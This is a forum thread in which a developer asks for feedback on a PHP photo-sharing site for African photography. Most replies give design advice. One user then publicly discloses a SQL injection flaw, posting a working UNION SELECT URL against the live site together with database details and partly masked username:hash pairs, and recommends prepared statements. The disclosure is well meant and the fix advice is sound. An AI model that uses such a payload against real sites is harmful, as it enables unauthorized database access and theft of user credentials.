I am making a photo sharing website that focus on African photos and community. This is a project I am using to pass time since am off from work now.

I am using php less framework because I wanted a responsive layout base on device resolution. Right now I have focus on one resolution but will soon complete others.

Please kindly tell me what you think and what to improve on. I know the whole website is not done but half way input will surely help in improving the final project.

I am integrating the facebook and twitter login script now.

Feel free to send your input irrespective of what you think about the website. http://inducesmile.com

Thanks so much for your time

I've not had time to go through the site, but at first glance, I like what I see.

The list of pictures on the home page is kind of long. Perhaps, you can break it into pages.

Then, as an indication of how interesting a photo is, you can add number of comments of each photo next to the number of views on the listing page.

When I have the time, I'll drop by and do a more thorough analysis.

mitey, I concur.

OP:
Maybe you should have major categories (as links) listed on the home page, and maybe with a photo count for each section. Then I click a link that takes me to a page that has maybe 4 or 5 photos for that section and a "more" link to the rest.

Your site reminds me of why I don't like visiting facebook at times - na so so scroll scroll, to infinity.

Thank you mitey and yawatide for the comments and observation.
@yawatida, I implemented infinite scroll in the photo categories. I have seen infinite scroll in many websites before but what I don't know for sure if many people like it(I did not search for any case study about infinite scroll). I have taken notice of other points you guys raised.

Just signed up but was unable to login. .

Slyr0x: Just signed up but was unable to login. .

It seems you have run some venerability script on the website. Hope you did not find a hole. I don't know while you could not login. Please can you try to login again. Thanks

^^^Announcing to the world via NL that you might have a leak on your site, not exactly a good idea

An attacker can execute arbitrary SQL statements on your website

hxxp://www.inducesmile.com/photo.php?photo_id=-53+UNION+/*!SELECT*/+unhex(hex(group_concat(********,0x3a,********))),2,3,4,5+from+****--
 
 Database: induce*****_***
 User: induce*****_***@web07-00.local
 Version: 5.1.63-0+squeeze1

Table "****"

dddd:bd83b96*************************,
dddd:bd83b96*************************,
henry:81dc9b*************************,
nollyj:f2494*************************,
test1:d85****************************,
Test:d857*****************************,
solution:ef73*************************,
Ngozi:f249****************************,
emma:f2494****************************,
justin:f2494**************************

How to fix this

1. Make use of prepared SQL Statements
2. Limit database privileges
3. Escape All User Supplied Input

You can read more here: https://www.owasp.org/images/7/7d/Advanced_Topics_on_SQL_Injection_Protection.ppt

Slyr0x: An attacker can execute arbitrary SQL statements on your website

hxxp://www.inducesmile.com/photo.php?photo_id=-53+UNION+/*!SELECT*/+unhex(hex(group_concat(********,0x3a,********))),2,3,4,5+from+****--
 
 Database: induce*****_***
 User: induce*****_***@web07-00.local
 Version: 5.1.63-0+squeeze1

Table "****"

dddd:bd83b96*************************,
dddd:bd83b96*************************,
henry:81dc9b*************************,
nollyj:f2494*************************,
test1:d85****************************,
Test:d857*****************************,
solution:ef73*************************,
Ngozi:f249****************************,
emma:f2494****************************,
justin:f2494**************************

How to fix this

1. Make use of prepared SQL Statements
2. Limit database privileges
3. Escape All User Supplied Input

You can read more here: https://www.owasp.org/images/7/7d/Advanced_Topics_on_SQL_Injection_Protection.ppt

Thanks so much I have fix it. Thanks for pointing out.

Just checked again. .

Nice try with the redirect thing going on. .but it can be easily bypassed.

Watch this video I made some months back http://rotimiakinyele.com/posts/bypassing-authentication-with-the-firefox-addon-noredirect.jsp

You really need to go back to your scripts and do a full audit.

Let's continue this in your mailbox. .

Slyr0x: Just checked again. .

Nice try with the redirect thing going on. .but it can be easily bypassed.

Watch this video I made some months back http://rotimiakinyele.com/posts/bypassing-authentication-with-the-firefox-addon-noredirect.jsp

You really need to go back to your scripts and do a full audit.

Let's continue this in your mailbox. .

ok use admin[at]inducesmile.com